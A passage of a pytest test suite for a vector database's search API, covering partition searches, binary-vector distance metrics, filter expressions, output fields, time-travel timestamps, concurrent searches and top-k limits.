default_search_params, limit, default_search_exp,
[par[0].name, par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_names",
[["(.*)"], ["search(.*)"]])
def test_search_index_partitions_fuzzy(self, nb, nq, dim, partition_names, auto_id, _async):
"""
target: test search from partitions
method: search from partitions with fuzzy
partition name
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim)[0:4]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search through partitions
log.info("test_search_index_partitions_fuzzy: searching through partitions")
limit = 1000
limit_check = limit
par = collection_w.partitions
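        # when the regex only matches the extra partition ("search(.*)"), restrict the expected ids to that partition and cap the expected limit at its entity count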
if partition_names == ["search(.*)"]:
insert_ids = insert_ids[par[0].num_entities:]
if limit > par[1].num_entities:
limit_check = par[1].num_entities
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
partition_names, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partition_empty(self, nq, dim, auto_id, _async):
"""
target: test search the empty partition
method: search from the empty partition
expected: searched successfully with 0 results
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, auto_id=auto_id,
dim=dim, is_index=True)[0]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create empty partition
partition_name = "search_partition_empty"
collection_w.create_partition(partition_name=partition_name, description="search partition empty")
par = collection_w.partitions
log.info("test_search_index_partition_empty: partitions: %s" % par)
collection_w.load()
# 3. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 4. search the empty partition
log.info("test_search_index_partition_empty: searching %s "
"entities through empty partition" % default_limit)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, [partition_name],
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_jaccard_flat_index(self, nq, dim, auto_id, _async, index):
"""
        target: search a binary collection and check the returned distance
        method: compare the returned distance with the value computed with JACCARD
        expected: the returned distance equals the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids, time_stamp = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:5]
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.jaccard(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.jaccard(query_raw_vector[0], binary_raw_vector[1])
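        # reference Jaccard distances, assumed to be 1 - |intersection| / |union| over the set bits of the two binary vectors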
# 4. search and compare the distance
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_hamming_flat_index(self, nq, dim, auto_id, _async, index):
"""
        target: search a binary collection and check the returned distance
        method: compare the returned distance with the value computed with HAMMING
        expected: the returned distance equals the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "HAMMING"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
collection_w.load()
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.hamming(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.hamming(query_raw_vector[0], binary_raw_vector[1])
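        # reference Hamming distances, i.e. the number of bit positions in which the two binary vectors differ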
# 4. search and compare the distance
search_params = {"metric_type": "HAMMING", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6843")
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_tanimoto_flat_index(self, nq, dim, auto_id, _async, index):
"""
        target: search a binary collection and check the returned distance
        method: compare the returned distance with the value computed with TANIMOTO
        expected: the returned distance equals the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
log.info("auto_id= %s, _async= %s" % (auto_id, _async))
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "TANIMOTO"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "TANIMOTO", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
    @pytest.mark.tags(CaseLabel.L2)
def test_search_without_expression(self, auto_id):
"""
target: test search without expression
method: 1. create connections,collection
2. first insert, and return with timestamp1
3. second insert, and return with timestamp2
4. search before timestamp1 and timestamp2
        expected: 1. data inserted at a timestamp cannot be searched with a travel timestamp before it
                  2. data inserted at a timestamp can be searched with a travel timestamp at or after it
"""
# 1. create connection, collection and insert
nb = 10
collection_w, _, _, insert_ids_1, time_stamp_1 = \
self.init_collection_general(prefix, True, nb, auto_id=auto_id, dim=default_dim)[0:5]
# 2. insert for the second time
log.info("test_search_without_expression: inserting for the second time")
_, entities, _, insert_ids_2, time_stamp_2 = cf.insert_data(collection_w, nb, auto_id=auto_id,
dim=default_dim, insert_offset=nb)[0:5]
# 3. extract vectors inserted for the second time
entities_list = np.array(entities[0]).tolist()
vectors = [entities_list[i][-1] for i in range(default_nq)]
# 4. search with insert timestamp1
log.info("test_search_without_expression: searching collection %s with time_stamp_1 '%d'"
% (collection_w.name, time_stamp_1))
search_res = collection_w.search(vectors, default_search_field,
default_search_params, default_limit,
travel_timestamp=time_stamp_1,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids_1,
"limit": default_limit})[0]
log.info("test_search_without_expression: checking that data inserted "
"after time_stamp_2 is not searched at time_stamp_1")
for i in range(len(search_res)):
assert insert_ids_2[i] not in search_res[i].ids
# 5. search with insert timestamp2
time.sleep(gracefulTime)
log.info("test_search_without_expression: searching collection %s with time_stamp_2 '%d'"
% (collection_w.name, time_stamp_2))
log.info(time_stamp_2)
search_res = collection_w.search(vectors, default_search_field,
default_search_params, default_limit,
travel_timestamp=time_stamp_2,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids_1 + insert_ids_2,
"limit": default_limit})[0]
log.info("test_search_without_expression: checking that data inserted "
"after time_stamp_2 is searched at time_stamp_2")
for i in range(len(search_res)):
assert insert_ids_2[i] in search_res[i].ids
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions())
def test_search_with_expression(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True,
nb, dim=dim,
is_index=True)[0:4]
# filter result with expression in collection
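        # the expression is evaluated in Python (after mapping && / || to and / or) against each row's values; the locals int64 and float are deliberately named after the collection fields so eval can resolve them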
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
int64 = _vectors.int64[i]
float = _vectors.float[i]
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with expression
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 7910")
@pytest.mark.parametrize("bool_type", [True, False, "true", "false", 1, 0, 2])
def test_search_with_expression_bool(self, dim, auto_id, _async, bool_type):
"""
target: test search with different bool expressions
method: search with different bool expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. filter result with expression in collection
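        # normalise the string forms "true" / "false" to Python booleans before comparing against the stored bool field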
filter_ids = []
bool_type_cmp = bool_type
if bool_type == "true":
bool_type_cmp = True
if bool_type == "false":
bool_type_cmp = False
for i, _id in enumerate(insert_ids):
if _vectors[0][f"{default_bool_field_name}"][i] == bool_type_cmp:
filter_ids.append(_id)
# 4. search with different expressions
expression = f"{default_bool_field_name} == {bool_type}"
log.info("test_search_with_expression_bool: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions_field(default_float_field_name))
def test_search_with_expression_auto_id(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions with auto id
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=True,
dim=dim,
is_index=True)[0:4]
# filter result with expression in collection
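        # exec binds the float field's value to a local named after the field so that the subsequent eval of the expression can resolve it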
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
exec(f"{default_float_field_name} = _vectors.{default_float_field_name}[i]")
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with different expressions
log.info("test_search_with_expression_auto_id: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
def test_search_expression_all_data_type(self, nb, nq, dim, auto_id, _async):
"""
target: test search using different supported data type
method: search using different supported data type
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_expression_all_data_type: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
search_exp = "int64 >= 0 && int32 >= 0 && int16 >= 0 " \
"&& int8 >= 0 && float >= 0 && double >= 0"
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
        assert default_int64_field_name in res[0][0].entity._row_data
        assert default_float_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_empty(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with empty output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_with_output_fields_empty: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_field(self, auto_id, _async):
"""
target: test search with output fields
method: search with one output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)[0:4]
# 2. search
log.info("test_search_with_output_field: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with multiple output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_with_output_fields: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
        assert default_int64_field_name in res[0][0].entity._row_data
        assert default_float_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*"], ["*", default_float_field_name]])
def test_search_with_output_field_wildcard(self, output_fields, auto_id, _async):
"""
target: test search with output fields using wildcard
method: search with one output_field (wildcard)
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)[0:4]
# 2. search
log.info("test_search_with_output_field_wildcard: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=output_fields,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
        assert default_int64_field_name in res[0][0].entity._row_data
        assert default_float_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, nb, nq, dim, auto_id, _async):
"""
target: test search multi collections of L2
method: add vectors into 10 collections, and search
        expected: search status ok; each search returns the expected number of results
"""
self._connect()
collection_num = 10
for i in range(collection_num):
# 1. initialize with data
log.info("test_search_multi_collections: search round %d" % (i + 1))
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_multi_collections: searching %s entities (nq = %s) from collection %s" %
(default_limit, nq, collection_w.name))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_concurrent_multi_threads(self, nb, nq, dim, auto_id, _async):
"""
        target: test concurrent search with multiple threads
        method: search with 10 threads, all sharing the same collection object
expected: status ok and the returned vectors should be query_records
"""
# 1. initialize with data
threads_num = 10
threads = []
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:5]
def search(collection_w):
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
        # 2. search with multiple threads
        log.info("test_search_concurrent_multi_threads: searching with %s threads" % threads_num)
for i in range(threads_num):
t = threading.Thread(target=search, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("round_decimal", [0, 1, 2, 3, 4, 5, 6])
def test_search_round_decimal(self, round_decimal):
"""
        target: test search with valid round_decimal values
        method: search with round_decimal in [0, 6] and compare with the un-rounded results
        expected: the returned distances are rounded to the given number of decimals
"""
import math
tmp_nb = 500
tmp_nq = 1
tmp_limit = 5
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, nb=tmp_nb)[0]
# 2. search
log.info("test_search_round_decimal: Searching collection %s" % collection_w.name)
res, _ = collection_w.search(vectors[:tmp_nq], default_search_field,
default_search_params, tmp_limit)
res_round, _ = collection_w.search(vectors[:tmp_nq], default_search_field,
default_search_params, tmp_limit, round_decimal=round_decimal)
abs_tol = pow(10, 1 - round_decimal)
# log.debug(f'abs_tol: {abs_tol}')
for i in range(tmp_limit):
dis_expect = round(res[0][i].distance, round_decimal)
dis_actual = res_round[0][i].distance
# log.debug(f'actual: {dis_actual}, expect: {dis_expect}')
# abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
assert math.isclose(dis_actual, dis_expect, rel_tol=0, abs_tol=abs_tol)
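The tolerance arithmetic in the test above can be sanity-checked on its own. This is a minimal, self-contained sketch (the sample distance is made up) of the same comparison: a distance rounded to round_decimal places must match the locally rounded value within an absolute tolerance of 10 ** (1 - round_decimal).

import math

def check_rounding(raw_distance, returned_distance, round_decimal):
    # Same comparison as the test: no relative tolerance, absolute tolerance 10 ** (1 - round_decimal)
    abs_tol = pow(10, 1 - round_decimal)
    return math.isclose(returned_distance, round(raw_distance, round_decimal), rel_tol=0, abs_tol=abs_tol)

assert check_rounding(0.123456789, 0.123, 3)   # hypothetical raw distance rounded to 3 decimals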
"""
******************************************************************
# The following cases are copied from test_search.py
******************************************************************
"""
def init_data(connect, collection, nb=3000, partition_names=None, auto_id=True):
"""
    Generate entities and insert them into the collection
"""
global entities
if nb == 3000:
insert_entities = entities
else:
insert_entities = gen_entities(nb, is_normal=True)
if partition_names is None:
res = connect.insert(collection, insert_entities)
else:
res = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
ids = res.primary_keys
return insert_entities, ids
def init_binary_data(connect, collection, nb=3000, insert=True, partition_names=None):
"""
    Generate entities and insert them into the collection
"""
ids = []
global binary_entities
global raw_vectors
if nb == 3000:
insert_entities = binary_entities
insert_raw_vectors = raw_vectors
else:
insert_raw_vectors, insert_entities = gen_binary_entities(nb)
if insert is True:
if partition_names is None:
res = connect.insert(collection, insert_entities)
else:
res = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
ids = res.primary_keys
return insert_raw_vectors, insert_entities, ids
def check_id_result(result, id):
limit_in = 5
ids = [entity.id for entity in result]
if len(result) >= limit_in:
return id in ids[:limit_in]
else:
return id in ids
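As a quick illustration of check_id_result's behavior (only the first limit_in hits are considered once the result is long enough), here is a small sketch that assumes it runs next to the helper above; the Hit tuple and the ids are invented for the example.

from collections import namedtuple

Hit = namedtuple("Hit", ["id"])              # hypothetical stand-in for a search hit

short_result = [Hit(i) for i in range(3)]    # fewer than limit_in (5): the whole list is searched
long_result = [Hit(i) for i in range(10)]    # 10 hits: only the first 5 are considered

assert check_id_result(short_result, 2)
assert check_id_result(long_result, 4)       # inside the first 5 hits
assert not check_id_result(long_result, 9)   # present, but outside the first 5 hits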
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_structure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == "FLAT":
return request.param
# else:
# pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
scope="function",
params=[1, 10]
)
def get_top_k(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[1, 10, 1100]
)
def get_nq(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_search_flat_top_k(self, connect, collection, get_nq):
"""
        target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = 16385 # max top k is 16384
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
connect.search(collection, **query)
@pytest.mark.skip("r0.3-test")
def _test_search_field(self, connect, collection, get_top_k, get_nq):
"""
        target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, **query, fields=["float_vector"])
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, **query, fields=["float"])
for i in range(nq):
assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
else:
with pytest.raises(Exception):
connect.search(collection, **query)
def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
"""
        target: test basic search function before and after deletion, all the search params are
        correct, change top-k value.
        check issue #4200 (https://github.com/milvus-io/milvus/issues/4200)
method: search with the given vectors, check the result
expected: the deleted entities do not exist in the result.
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection, nb=10000)
first_int64_value = entities[0]["values"][0]
first_vector = entities[2]["values"][0]
search_param = get_search_param("FLAT")
query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
vecs[:] = []
vecs.append(first_vector)
res = None
if top_k > max_top_k:
with pytest.raises(Exception):
connect.search(collection, **query, fields=['int64'])
# pytest.skip("top_k value is larger than max_topp_k")
pass
else:
res = connect.search(collection, **query, fields=['int64'])
assert len(res) == 1
assert len(res[0]) >= top_k
assert res[0][0].id == ids[0]
assert res[0][0].entity.get("int64") == first_int64_value
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.delete_entity_by_id(collection, ids[:1])
connect.flush([collection])
res2 = connect.search(collection, **query, fields=['int64'])
assert len(res2) == 1
assert len(res2[0]) >= top_k
assert res2[0][0].id != ids[0]
if top_k > 1:
assert res2[0][0].id == res[0][1].id
assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
        target: test basic search function, all the search params are correct, test all index params, and build
        method: add vectors into collection, search with the given vectors, check the result
        expected: the length of the result is top_k; searching the collection with the partition tag returns empty
"""
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.release_collection(collection)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, partition_names=[default_tag])
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
"""
target: test basic search function, all the search params are correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = 2
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
connect.create_partition(collection, default_tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_names=default_tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
if top_k > max_top_k:
with pytest.raises(Exception) as e:
res = connect.search(collection, **query)
else:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, **query, partition_names=[new_tag])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] > epsilon
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq, metric_type="IP")
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res[0]) == top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
@pytest.mark.tags(CaseLabel.L2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params are correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type in skip_pq():
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
